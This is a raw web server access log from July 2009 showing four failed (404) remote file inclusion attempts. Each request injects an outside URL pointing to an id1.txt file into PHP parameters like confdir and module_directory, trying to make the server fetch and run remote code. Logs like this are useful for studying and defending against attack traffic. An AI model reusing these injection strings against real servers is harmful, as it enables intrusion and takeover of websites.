63.147.72.145 - - [20/Jul/2009:04:02:27 -0400] "GET /logs/access_log.Q109070300//config/dbutil.bck.php?confdir=http://juni0r.altervista.org/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.25.134.14 - - [20/Jul/2009:04:03:06 -0400] "GET //Patch/catalog/admin/modules.php?module_directory=http://aboutav.com//id1.txt????? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.25.134.14 - - [20/Jul/2009:04:03:06 -0400] "GET /logs//Patch/catalog/admin/modules.php?module_directory=http://aboutav.com//id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.25.134.14 - - [20/Jul/2009:04:03:06 -0400] "GET /logs/access_log.Q109062800%20%20//Patch/catalog/admin/modules.php?module_directory=http://aboutav.com//id1.txt????? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
